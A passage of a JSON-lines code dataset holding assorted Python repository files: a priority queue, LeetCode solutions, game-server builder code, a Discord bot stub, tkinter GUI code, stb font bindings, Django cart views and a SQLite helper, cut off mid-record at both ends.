conversion\n '''\n def __init__(self, default_func, insert_after_missing=False):\n self._missing = default_func\n self._dict = {}\n self.insert_after_missing = insert_after_missing\n\n def __delitem__(self, key):\n if type(key) is np.ndarray:\n key = tuple(key)\n if key in self._dict:\n del self._dict[key]\n\n def __getitem__(self, key):\n if type(key) is np.ndarray:\n key = tuple(key)\n if key in self._dict:\n return self._dict[key]\n else:\n ret = self._missing(key)\n if self.insert_after_missing:\n self[key] = ret\n return ret\n\n def __setitem__(self, key, obj):\n if type(key) is np.ndarray:\n key = tuple(key)\n self._dict[key] = obj\n\n\n# mostly from https://docs.python.org/2/library/heapq.html\nclass PQ:\n def __init__(self):\n self.pq = [] # list of entries arranged in a heap\n self.entry_finder = {} # mapping of vertexs to entries\n self.REMOVED = '' # placeholder for a removed vertex\n self.counter = itertools.count() # unique sequence count\n\n def __contains__(self, obj):\n if type(obj) is np.ndarray: obj = tuple(obj)\n return obj in self.entry_finder\n\n def top_key(self):\n while self.pq:\n if self.pq[0][-1] is self.REMOVED:\n heappop(self.pq)\n else:\n return self.pq[0][0]\n\n def push(self, obj, priority):\n 'Add a new vertex or update the priority of an existing vertex'\n if type(obj) is np.ndarray: obj = tuple(obj)\n if obj in self.entry_finder:\n self.remove(obj)\n count = next(self.counter)\n entry = [priority, count, obj]\n self.entry_finder[obj] = entry\n heappush(self.pq, entry)\n\n def remove(self, obj):\n 'Mark an existing vertex as REMOVED. Raise KeyError if not found.'\n if type(obj) is np.ndarray: obj = tuple(obj)\n entry = self.entry_finder.pop(obj)\n entry[-1] = self.REMOVED\n\n def pop(self):\n 'Remove and return the lowest priority vertex. 
Raise KeyError if empty.'\n while self.pq:\n priority, count, vertex = heappop(self.pq)\n if vertex is not self.REMOVED:\n del self.entry_finder[vertex]\n return vertex\n raise KeyError('pop from an empty priority queue')\n\n def __iter__(self):\n while self.top_key() is not None:\n yield self.pop()\n","repo_name":"arl-o/MPGAA-implementation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23668415010","text":"class Solution:\n def majorityElement(self, nums):\n\n nums.sort()\n\n return nums[len(nums)//2]\n\n def majorityElement2(self, nums):\n\n count = 0\n element = 0\n\n for num in nums:\n if count == 0:\n element = num\n\n if num == element:\n count += 1\n else:\n count -= 1\n\n return element\n\n def majorityElement3(self, nums):\n\n return max(set(nums), key=nums.count)\n\ns = Solution()\n\nprint(s.majorityElement2([2,2,1,1,1,2,2]))\n","repo_name":"EashanKaushik/LeetCode","sub_path":"30-Day-Challange/Day-3-Array/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4246956459","text":"def is_prime(n):\n if n < 2:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True\n\ndef nth_prime(n):\n prime_count = 0\n i = 2\n while True:\n if is_prime(i):\n prime_count += 1\n if prime_count == n:\n return i\n i += 1\n\nn = int(input(\"Enter the value of N: \"))\nnth_prime_number = nth_prime(n)\nprint(f\"The {n}th prime number is {nth_prime_number}\")\nprint(\"The next 5 integers are:\")\nfor i in range(1, 6):\n print(nth_prime_number + i)\n\n\n\n#grepper python lambda function\n#Description: A lambda function is a small, anonymous function defined using the lambda keyword. 
It can take any number of arguments but can only have one expression.\n#Example: square = lambda x: x * x\n#end grepper","repo_name":"maxacode/Technical-Interview-Prep-Sites","sub_path":"LeetCode/nthPrime+5integers.py","file_name":"nthPrime+5integers.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40715039153","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\n\nfrom pirates.world.GameAreaBuilderAI import GameAreaBuilderAI\nfrom pirates.leveleditor import ObjectList\nfrom pirates.leveleditor import WorldDataGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.world.DistributedCellDoorAI import DistributedCellDoorAI\nfrom pirates.minigame.DistributedPokerTableAI import DistributedPokerTableAI\nfrom pirates.minigame.DistributedHoldemTableAI import DistributedHoldemTableAI\nfrom pirates.minigame.DistributedBlackjackTableAI import DistributedBlackjackTableAI\nfrom pirates.minigame.Distributed7StudTableAI import Distributed7StudTableAI\nfrom pirates.minigame.DistributedBishopsHandTableAI import DistributedBishopsHandTableAI\nfrom pirates.minigame.DistributedLiarsDiceAI import DistributedLiarsDiceAI\n\n\nclass InteriorAreaBuilderAI(GameAreaBuilderAI):\n notify = directNotify.newCategory('InteriorAreaBuilderAI')\n\n def __init__(self, air, parent):\n GameAreaBuilderAI.__init__(self, air, parent)\n\n self.wantJailCellDoors = config.GetBool('want-jail-cell-doors', True)\n self.wantParlorGames = config.GetBool('want-parlor-games', True)\n\n def createObject(self, objType, objectData, parent, parentUid, objKey, dynamic, parentIsObj=False, fileName=None, actualParentObj=None):\n newObj = None\n if objType == ObjectList.DOOR_LOCATOR_NODE and self.wantDoorLocatorNodes:\n newObj = self.createDoorLocatorNode(parent, parentUid, objKey, objectData)\n elif objType == ObjectList.LOCATOR_NODE and self.wantConnectorLocatorNodes:\n newObj = self.createConnectorLocatorNode(parent, parentUid, objKey, objectData)\n elif objType == 'Jail Cell Door' and self.wantJailCellDoors:\n newObj = self.createCellDoor(parent, parentUid, objKey, objectData)\n elif objType == 'Parlor Game' and self.wantParlorGames:\n newObj = self.createParlorTable(objectData, parent, parentUid, objKey)\n else:\n newObj = GameAreaBuilderAI.createObject(self, objType, objectData, parent, parentUid,\n objKey, dynamic, parentIsObj, fileName, actualParentObj)\n\n return newObj\n\n def createDoorLocatorNode(self, parent, parentUid, objKey, objectData):\n from pirates.world.DistributedInteriorDoorAI import DistributedInteriorDoorAI\n\n doorLocatorNode = DistributedInteriorDoorAI(self.air)\n doorLocatorNode.setUniqueId(objKey)\n doorLocatorNode.setPos(objectData.get('Pos', (0, 0, 0)))\n doorLocatorNode.setHpr(objectData.get('Hpr', (0, 0, 0)))\n doorLocatorNode.setScale(objectData.get('Scale', (1, 1, 1)))\n doorLocatorNode.setInteriorId(self.parent.doId, self.parent.parentId, self.parent.zoneId)\n\n if not self.parent.getInteriorFrontDoor():\n self.parent.setInteriorFrontDoor(doorLocatorNode)\n exteriorDoor = self.parent.getExteriorFrontDoor()\n else:\n doorLocatorNode.setDoorIndex(1)\n self.parent.setInteriorBackDoor(doorLocatorNode)\n exteriorDoor = self.parent.getExteriorBackDoor()\n\n if not exteriorDoor:\n self.notify.debug('Cannot generate interior door %s, '\n 'cant find other exterior door!' 
% objKey)\n\n return\n\n exteriorWorld = self.parent.getParentObj()\n if not exteriorWorld:\n self.notify.debug('Cannot create interior door %s, '\n 'for exterior with no parent!' % objKey)\n\n return\n\n exterior = exteriorDoor.getParentObj()\n if not exterior:\n self.notify.debug('Cannot create interior door %s, '\n 'no exterior found!' % objKey)\n\n return\n\n doorLocatorNode.setBuildingUid(exteriorDoor.getBuildingUid())\n doorLocatorNode.setOtherDoor(exteriorDoor)\n doorLocatorNode.setExteriorId(exterior.doId, exteriorWorld.doId, exterior.zoneId)\n doorLocatorNode.setBuildingDoorId(exteriorDoor.doId)\n\n zoneId = self.parent.getZoneFromXYZ(doorLocatorNode.getPos())\n self.parent.generateChildWithRequired(doorLocatorNode, zoneId)\n exteriorDoor.setOtherDoor(doorLocatorNode)\n self.addObject(doorLocatorNode)\n\n # update the game area's links\n links = self.parent.getLinks()\n links.append(['', doorLocatorNode.doId, '', self.parent.parentId, self.parent.zoneId, '',\n exteriorWorld.parentId, exteriorWorld.zoneId])\n\n self.parent.b_setLinks(links)\n return doorLocatorNode\n\n def createConnectorLocatorNode(self, parent, parentUid, objKey, objectData):\n locatorName = objectData.get('Name', '')\n if 'interior' not in locatorName:\n return\n\n self.air.worldCreator.locatorManager.addLocator(parentUid, objKey, objectData)\n\n def createCellDoor(self, parent, parentUid, objKey, objectData):\n cellDoor = DistributedCellDoorAI(self.air)\n cellDoor.setUniqueId(objKey)\n cellDoor.setPos(objectData.get('Pos', (0, 0, 0)))\n cellDoor.setHpr(objectData.get('Hpr', (0, 0, 0)))\n cellDoor.setScale(objectData.get('Scale', (1, 1, 1)))\n cellDoor.setCellIndex(objectData.get('Cell Index', 0))\n\n zoneId = self.parent.getZoneFromXYZ(cellDoor.getPos())\n self.parent.generateChildWithRequired(cellDoor, zoneId)\n #self.parentObjectToCell(cellDoor, zoneId)\n\n self.addObject(cellDoor)\n self.parent.addCellDoor(cellDoor)\n return cellDoor\n\n def createParlorTable(self, objectData, parent, parentUid, objKey):\n tableCls = None\n gameType = objectData.get('Category', 'Unknown')\n if gameType == 'Holdem':\n tableCls = DistributedHoldemTableAI\n elif gameType == 'Blackjack':\n tableCls = DistributedBlackjackTableAI\n elif gameType == '7Stud':\n tableCls = Distributed7StudTableAI\n elif gameType == 'Bishops':\n tableCls = DistributedBishopsHandTableAI\n elif gameType == 'LiarsDice':\n tableCls = DistributedLiarsDiceAI\n else:\n self.notify.warning('Failed to generate Parlor Table %s; %s is not a valid game type' % (objKey, gameType))\n return\n\n gameTable = tableCls(self.air)\n gameTable.setUniqueId(objKey)\n gameTable.setPos(objectData.get('Pos', (0, 0, 0)))\n gameTable.setHpr(objectData.get('Hpr', (0, 0, 0)))\n gameTable.setScale(objectData.get('Scale', 1))\n gameTable.generatePlayers()\n\n if hasattr(gameTable, 'setGameType'):\n gameTable.setGameType(gameType)\n\n if hasattr(gameTable, 'setBetMultiplier'):\n gameTable.setBetMultiplier(int(objectData.get('BetMultiplier', '1')))\n\n zoneId = self.parent.getZoneFromXYZ(gameTable.getPos())\n self.parent.generateChildWithRequired(gameTable, zoneId)\n self.parentObjectToCell(gameTable, zoneId)\n self.addObject(gameTable)\n return gameTable\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/world/InteriorAreaBuilderAI.py","file_name":"InteriorAreaBuilderAI.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} 
+{"seq_id":"32342279474","text":"\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nbot = commands.Bot(command_prefix='!' , intents=discord.Intents.all())\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('the bot is online!!')\r\n\r\n\r\n\r\nbot.run(\"your token\")\r\n","repo_name":"ABOONYT/python-tutorial","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6581459602","text":"import tkinter as tk\nfrom tkinter import *\nimport config\n\nfrom menu.MenuParameters import MenuParameters\nfrom menu.MenuInputSignal import MenuInputSignal \n\nfrom menu.MenuFirstOrder import MenuFirstOrder\nfrom menu.MenuSecondOrder import MenuSecondOrder\n\nfrom menu.MenuSinewave import MenuSinewave\nfrom menu.MenuSinglePulse import MenuSinglePulse\nfrom menu.MenuPeriodicPulse import MenuPeriodicPulse\n\nmenus = [\n MenuParameters,\n MenuInputSignal\n]\n\nclass MenuMain(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n\n self.controller = controller\n self.parent = parent\n\n self.buttonParameters = tk.Button(\n self, width=26, text=\"Parametros\", \n font=config.SMALL_FONT, bg=\"#ffe4c4\", relief=FLAT, \n command=self.buttonParametersPressed)\n\n self.buttonInputSignal = tk.Button(\n self, width=26, text=\"Señal de entrada\",\n font=config.SMALL_FONT, bg=\"#fff0bc\", command=self.buttonInputSignalPressed)\n\n self.buttonParameters.grid( row=0, column=0, ipadx=4, sticky = W)\n self.buttonInputSignal.grid(row=0, column=1, ipadx=4, sticky = E)\n\n self.buttonSimulate = tk.Button(\n self, width=36, text=\"Simular\",\n font=config.SMALL_FONT, background=\"#fff0bc\", command=self.buttonSimulatePressed)\n\n self.buttonSimulate.grid(row=2, column=0, columnspan=3, pady=45, sticky=S)\n\n self.containMenu = tk.Frame(self)\n self.containMenu.grid(row=1, column=0, columnspan=3, sticky=E+W+N+S)\n\n self.menus = {}\n\n for menu in menus:\n self.menus[menu] = menu(self.containMenu, self)\n self.menus[menu].grid_propagate(True)\n self.menus[menu].grid(row=0, column=0, sticky=E+W+N+S)\n self.menus[menu].config(bg=\"#ffe4c4\")\n \n self.showMenu(MenuParameters)\n\n #Menu managing functions\n \n def showMenu(self, menu):\n self.menus[menu].focus()\n menu = self.menus[menu]\n menu.tkraise()\n self.menu = menu\n\n def getCurrentMenu(self):\n return self.menu\n\n #Buttons' callback functions\n \n def buttonParametersPressed(self):\n self.buttonParameters.config( relief=FLAT, bg=\"#ffe4c4\")\n self.buttonInputSignal.config(relief=RAISED, bg=\"#fff0bc\")\n self.showMenu(MenuParameters)\n\n def buttonInputSignalPressed(self):\n self.buttonParameters.config( relief=RAISED, bg=\"#fff0bc\")\n self.buttonInputSignal.config(relief=FLAT, bg=\"#ffe4c4\")\n self.showMenu(MenuInputSignal)\n\n def buttonSimulatePressed(self):\n self.menus[MenuInputSignal].getCurrentSignalMenu().updateSignal()\n self.controller.curveFrame.getCurrentCurve().simulate()\n for menu in menus:\n self.menus[menu].resetButtons()\n\n def focus(self):\n pass","repo_name":"tlondero/TPs-Electro","sub_path":"TP-Final/GUI/menu/MenuMain.py","file_name":"MenuMain.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10550393107","text":"import ctypes\nfrom ctypes import c_int, c_float, c_void_p, c_short, c_char, byref, string_at\n\n# dlopen\nstb = 
ctypes.cdll.LoadLibrary(\"./build/libstb.so\")\n\n# Define non-int function return value\nstb.stbtt_ext_AllocFontinfo.restype = c_void_p\nstb.stbtt_ScaleForPixelHeight.restype = c_float\nstb.stbtt_GetGlyphBitmap.restype = c_void_p # raw memory bytes can be accessed via ctypes.string_at\n\n# Define wrapper for automatic malloc/free\nclass Fontinfo:\n def __init__(self):\n self.ptr_fontinfo = stb.stbtt_ext_AllocFontinfo()\n self._as_parameter_ = c_void_p(self.ptr_fontinfo)\n\n def __del__(self):\n stb.stbtt_ext_FreeFontinfo(self.ptr_fontinfo)\n\n\n#\n# Reimplementation of ex00_font_info.cpp\n#\n\nfontfile = \"/usr/share/fonts/TTF/Roboto-Regular.ttf\"\ncodepoint = b\"J\"\nsize_px = 16\n\n#\n# Initialization\n#\nfont = Fontinfo()\nwith open(fontfile, 'rb') as f:\n fontdata = f.read()\n\nfont_offset = stb.stbtt_GetFontOffsetForIndex(fontdata, 0)\nassert font_offset >= 0\n\nstatus = stb.stbtt_InitFont(font, fontdata, font_offset)\nassert status != 0\n\nglyph_index = stb.stbtt_FindGlyphIndex(font, ord(codepoint));\nassert glyph_index != 0\n\nprint(\"== Codepoint info ==\")\nprint(dict(codepoint=codepoint, glyph_index=glyph_index))\nprint(\"\")\n\n\n#\n# Obtain metrics\n#\nglobal_metrics = dict((name, c_int()) for name in [\n 'ascent', 'descent', 'line_gap', 'x_min', 'y_min', 'x_max', 'y_max'])\nstb.stbtt_GetFontVMetrics(\n font, *[byref(global_metrics[k]) for k in ['ascent', 'descent', 'line_gap']]);\nstb.stbtt_GetFontBoundingBox(\n font, *[byref(global_metrics[k]) for k in ['x_min', 'y_min', 'x_max', 'y_max']]);\n\nglyph_metrics = dict((name, c_int()) for name in [\n 'advance', 'bearing', 'x_min', 'y_min', 'x_max', 'y_max'])\nstb.stbtt_GetGlyphHMetrics(\n font, glyph_index, *[byref(glyph_metrics[k]) for k in ['advance', 'bearing']]);\nstb.stbtt_GetGlyphBox(\n font, glyph_index, *[byref(glyph_metrics[k]) for k in ['x_min', 'y_min', 'x_max', 'y_max']]);\n\nprint(\"== Global metrics ==\")\nprint(dict((k, v.value) for k, v in global_metrics.items()))\nprint(\"\")\n\nprint(\"== Glyph metrics ==\")\nprint(dict((k, v.value) for k, v in glyph_metrics.items()))\nprint(\"\")\n\n#\n# Obtain glyph geometry\n#\nptr_vertices = c_void_p(0)\nnum_vertices = stb.stbtt_GetGlyphShape(font, glyph_index, byref(ptr_vertices));\nassert num_vertices > 0\n\n# Define stbtt_vertex's byte alignment in ctypes\n# TODO: somehow we get \"uninitialized-value\" looking data for `padding`, `cx1`, `cy1`.\nclass Vertex(ctypes.Structure):\n _fields_ = \\\n [(name, c_short) for name in ['x', 'y', 'cx', 'cy', 'cx1', 'cy1']] + \\\n [(name, c_char ) for name in ['type', 'padding']]\n\n type_to_str = [\"NA\", \"move\", \"line\", \"curve\", \"cubic\"]\n\n def to_dict(self):\n result = {}\n result['type'] = Vertex.type_to_str[self.type[0]]\n result['padding'] = self.padding[0]\n for name in ['x', 'y', 'cx', 'cy', 'cx1', 'cy1']:\n result[name] = getattr(self, name)\n return result\n\n# Magical array instantiation\nvertices = (Vertex * num_vertices).from_address(ptr_vertices.value)\n\nprint(\"== Glyph geometry ==\")\nfor vertex in vertices:\n print(vertex.to_dict())\nprint(\"\")\n\nstb.stbtt_FreeShape(font, ptr_vertices)\n\n\n#\n# Rasterize to bitmap\n#\nscale_y = stb.stbtt_ScaleForPixelHeight(font, c_float(size_px))\nw, h = c_int(), c_int()\nptr_bitmap = stb.stbtt_GetGlyphBitmap(\n font, c_float(0), c_float(scale_y),\n glyph_index, byref(w), byref(h), byref(c_int(0)), byref(c_int(0)))\nbitmap = string_at(ptr_bitmap, size=w.value * h.value)\n\nprint(\"== Rendering ==\")\nfor i in range(h.value):\n for j in range(w.value):\n idx = i * 
w.value + j\n print(\" .:ioVM@\"[bitmap[idx] >> 5], end='')\n print()\n\nstb.stbtt_FreeBitmap(c_void_p(ptr_bitmap), 0)\n","repo_name":"hi-ogawa/python-shader-app","sub_path":"misc/font/src/ex00_font_info.py","file_name":"ex00_font_info.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"10060955678","text":"import json\r\nimport requests\r\n\r\n\r\ndef lambda_handler(event, context):\r\n #postcode\r\n postcode = event['rawQueryString']\r\n constituency_url = \"https://api.postcodes.io/postcodes/{}/\".format(postcode)\r\n page = requests.get(constituency_url)\r\n\r\n data = json.loads(page.content)\r\n constituency = data['result']['parliamentary_constituency']\r\n \r\n return {\r\n 'statusCode': 200,\r\n 'headers': {\r\n 'Access-Control-Allow-Headers': 'Content-Type',\r\n 'Access-Control-Allow-Origin': 'http://127.0.0.1:5500',\r\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'\r\n },\r\n 'body' : constituency\r\n }\r\n","repo_name":"muhafara/Python","sub_path":"capstone-project/Python/lambda functions/parliamentary_contituency.py","file_name":"parliamentary_contituency.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"683292975","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom error_and_success import cases\nfrom users.models import Customer\nfrom carts.models import Cart\nfrom carts.models import CartDetails\nfrom orders.models import Order, OrderProduct\nfrom products.models import Product\nfrom django.http import JsonResponse\n\n\n\n# Create your views here.\n@login_required()\ndef add_or_count_cart(request):\n # this function responds to GET and POST requests to the url: /carts\n # it is used to add products to the cart (POST) and to display the size of the cart (GET)\n if request.method == 'POST':\n # If the method is POST we get the user that send the request and the corresponding shopping cart\n # If the cart already contains this product we raise the quantity in the cart by one, otherwise\n # we initialize a cart detail instance that connects the product to the cart\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=request.POST['product_id'])\n cart_details = CartDetails.objects.filter(cart=cart, product=product)\n if len(cart_details) == 0:\n cart_detail = CartDetails(cart=cart, product=product)\n else:\n cart_detail = cart_details.first()\n cart_detail.quantity += 1\n cart_detail.save()\n return JsonResponse({'count': count_cart(customer, cart)})\n elif request.method == 'GET':\n # If the method is GET we get the user that send the request and the corresponding shopping cart\n # and return the size of the cart\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n return JsonResponse({'count': count_cart(customer, cart)})\n else:\n return JsonResponse({'error': 'invalid request'})\n\n\n@login_required()\ndef count_cart(customer, cart):\n # this function calculates the size of a cart, looks at every cartdetail\n # and returns the sum of the quantity of each product in the cart\n count = 0\n for cart_detail in CartDetails.objects.filter(cart=cart):\n count += cart_detail.quantity\n return count\n\n@login_required()\ndef 
view_cart(request):\n # This function takes a request from a registered user and returns a a list\n # of all the products in the user's cart along with the total price.\n customer = Customer.objects.filter(user=request.user).first()\n cart = Cart.objects.filter(user=customer.id).first()\n cart_details = CartDetails.objects.filter(cart=cart)\n products = []\n total = 0\n total_in_cart = 0\n for cart_detail in cart_details:\n product = Product.objects.filter(id=cart_detail.product.id).first()\n total_in_cart += 1\n products.append({'product': product, 'quantity': cart_detail.quantity})\n if product.on_sale == True:\n total += (product.discount_price * cart_detail.quantity)\n else:\n total += (product.price * cart_detail.quantity)\n orders = Order.objects.filter(customer=customer)\n # The user only has one cart and therefore all unconfirmed orders are deleted if\n # the user views his cart again without confirming an order, because if he is in\n # the cart the old order may be invalid and a new is created if he presses checkout\n for order in orders:\n if order.confirmed == False:\n order_products = OrderProduct.objects.filter(order=order)\n for order_product in order_products:\n order_product.delete()\n order.delete()\n\n context1 = {'products': products, 'total_price': round(total,2)}\n context1 = cases.get_profile(context1, request)\n context2 = cases.get_profile(dict(), request)\n\n\n if total_in_cart != 0:\n return render(request, 'carts/cart_details.html', context1)\n else:\n return render(request, 'carts/cart_details_empty.html', context2)\n\n@login_required()\ndef remove_from_cart(request, product_id):\n # This function takes a DELETE request from a registered user and removes the product\n # supplied in the request from the user's cart. If the process is successful, the\n # new total price of the cart is returned\n customer = Customer.objects.filter(user=request.user).first()\n if request.method == 'DELETE':\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=product_id)\n cart_detail = CartDetails.objects.filter(cart=cart, product=product).first()\n cart_detail.delete()\n return JsonResponse({'total_price': calc_price(cart)})\n return JsonResponse({'message': 'invalid request'})\n\ndef calc_price(cart):\n # this simple function finds all cart_detail instances connected to a cart\n # and returns the sum of the price of all the products in the cart\n total = 0\n cart_details = CartDetails.objects.filter(cart=cart)\n for cart_detail in cart_details:\n product = Product.objects.filter(id=cart_detail.product.id).first()\n # if the product is on sale, discount price is used\n if product.on_sale == True:\n total += (product.discount_price * cart_detail.quantity)\n else:\n total += (product.price * cart_detail.quantity)\n return round(total,2)\n\n@login_required()\ndef change_quantity(request, product_id):\n # this function takes a request from a registered user and changes the\n # quantity of a given product in the user's cart. The new quantity is\n # provided in the request. 
Returns the new total price of the cart\n customer = Customer.objects.filter(user=request.user).first()\n if request.method == 'POST':\n cart = Cart.objects.filter(user=customer.id).first()\n product = Product.objects.get(id=product_id)\n cart_detail = CartDetails.objects.filter(cart=cart, product=product).first()\n # if the new amount is 0, remove the product from the cart\n if int(request.POST['new_amount']) == 0:\n remove_from_cart(request, product_id)\n else:\n cart_detail.quantity = int(request.POST['new_amount'])\n cart_detail.save()\n return JsonResponse({'total_price': calc_price(cart)})\n return JsonResponse({'message': 'invalid request'})","repo_name":"huginngri/CaptainConsole","sub_path":"Captain_Console/carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16313610510","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"watchlist/\",\n views.update_watchlist, name=\"update_watchlist\"),\n path(\"category/\", views.category, name=\"category\"),\n path(\"listing/\", views.listing, name=\"listing\"),\n path(\"add_comment/\", views.add_comment, name=\"add_comment\"),\n path(\"bidding/\", views.bidding, name=\"bidding\"),\n path(\"close/\", views.close, name=\"close\"),\n]\n","repo_name":"mikeinnz/cs50web","sub_path":"commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39034512766","text":"import json\nimport os\nimport os.path\n#Sqlite\nfrom modulos.conexionBD import * #mysqli\n\ndef gravJson():\n\trutOri = []\n\textFotoVid = []\n\ttuplaExtensiones = ()\n\tgestionarBD = gestionBD()\n\tfor elemento in gestionarBD.obtenerDato('RUTAS_ORIGEN','RUTA'):\n\t\tfor elemento2 in elemento:\n\t\t\trutOri.append(elemento2)\n\n\tfor ele_ext in gestionarBD.obtenerDato('OPCIONES_USUARIO','EXT_FOTO_ORIGEN'):\n\t\tfor ele_ext2 in ele_ext:\n\t\t\textFotoVid.append(ele_ext2)\n\t\t\tseparador = \",\"\t\n\t\t\tlistaExt = ele_ext2.split(separador)\t\n\tfor ele_ext in gestionarBD.obtenerDato('OPCIONES_USUARIO','EXT_VID_ORIGEN'):\n\t\tfor ele_ext2 in ele_ext:\n\t\t\textFotoVid.append(ele_ext2)\t\n\t\t\tseparador = \",\"\t\n\t\t\tlistaExt = listaExt + ele_ext2.split(separador)\t\n\ttuplaExtensiones = tuple(listaExt)\n\t#Inicializamos variables\n\tlosFicheros = []\n\tpath=''\n\tdata = {}\n\tdata['ficheros'] = []\n\t#RutaFotosZuriNas = '//xabistation/homes/zuri/Photos/MobileBackup/'\n\t#RutaFotosXabiNas = '//xabistation/homes/xabitsu/Photos/MobileBackup/Galaxy S10 de Xabier/DCIM/Camera'\n\tfor elPath in rutOri:\n\t\tfor root,dirs,files in os.walk(elPath):\n\t\t\tfor file in files:\n\t\t\t\tif file.upper().endswith(tuplaExtensiones):\n\t\t\t\t\tdata['ficheros'].append({\n\t\t\t\t\t\t'nombre': file,\n\t\t\t\t\t\t'ruta': root,\n\t\t\t\t\t\t'extension': os.path.splitext(file)[1]})\n\n\t\twith open('ficherosaTratar.json', 'w') as file:\n\t\t\tjson.dump(data, file, indent=4)\t\n\nif __name__ == 
'__main__':\n\tgravJson()\t","repo_name":"XabiTobias/movil2pc","sub_path":"modulos/recogerFicheros.py","file_name":"recogerFicheros.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27725650544","text":"# -*- coding: utf-8 -*-\nprint(\"Hola mundo\")\n\"\"\"\nComentario multilínea\n\"\"\"\n\nmi_lista = [\"Johan\", \"Camilo\", \"Mosquera\"]\n# Agrega un elemento a la lista\nmi_lista.append(\"Ninco\")\n# Elimina un elenetos a la lista\nmi_lista.remove(\"Camilo\")\nmi_lista.remove(\"Ninco\")\n\nprint(mi_lista)","repo_name":"jocode/curso-python","sub_path":"listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41487768554","text":"import sqlite3\n\nclass SQL_requestions:\n \"\"\"\n Маленькая либа для sql запросов\n \"\"\"\n def __init__(self,path):\n \"\"\"\n >>> path - путь для взаимодействия с базой данных\n \"\"\"\n connect = sqlite3.connect(path)\n self.cursor = connect.cursor()\n \n def request(self,request_type:str, Table_name:str,Variable:str = None, Condition:str = None, arg:tuple = None):\n \"\"\"\n >>> request_type:str - тип запроса (SELECT, INSERT INTO,..)\n >>> Table_name - имя таблицы для взаимодействия Пример: \"FROM TABLE\"\n >>> Variable - запрашиваемое поле таблицы\n >>> Condition - условие (напр Where)\n >>> *args - некоторые дополонительные аргументы запроса. Вводить через запятую. Напр: Num1, '=', Num2\n\n \"\"\"\n responce_head = f\"{request_type} {Variable} {Table_name} {Condition}\"\n \n if Condition is not None:\n for conditions in arg:\n conditions = str(conditions)\n responce_head = responce_head +' ' + conditions\n print(responce_head)\n try:\n self.resp = self.cursor.execute(responce_head)\n _resp = self.resp.fetchall()\n self.cursor.close()\n return _resp\n except Exception as e:\n print('Ошибка Sql_request: ', e)\n \n\n \n\n \n \n ","repo_name":"MBFROBO/EMCP_conference","sub_path":"lib/sql_browse.py","file_name":"sql_browse.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27324041531","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport bountyomatic.storage\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bounty',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('reward', models.TextField(verbose_name='Reward')),\n ('description', models.TextField(verbose_name='Description')),\n ('status', models.PositiveSmallIntegerField(choices=[(1, 'Open'), (2, 'Closed'), (3, 'Cancelled')], default=1, verbose_name='Status')),\n ('region', models.CharField(max_length=2, choices=[('eu', 'Europe'), ('us', 'US')], default='eu', verbose_name='Region')),\n ('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Creation date')),\n ('updated_date', models.DateTimeField(auto_now=True, verbose_name='Latest update')),\n ('is_private', models.BooleanField(default=False, verbose_name='Private')),\n 